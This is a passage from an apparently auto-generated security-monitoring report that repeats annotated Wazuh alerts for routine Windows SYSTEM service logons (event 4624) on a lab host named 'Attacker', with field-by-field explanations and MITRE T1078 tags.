- Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:03.299+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:03.299+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  31
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533923.340987
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:46:37.0396840Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43649
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  14292
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:03.373+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:03.373+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  32
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533923.348325
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:46:37.1845071Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43651
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  14292
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:05.072+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:05.072+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  33
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533925.355663
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:46:40.7220277Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43675
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  9160
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:05.129+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:05.129+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  34
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533925.362999
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:46:40.8641766Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43677
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  14292
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

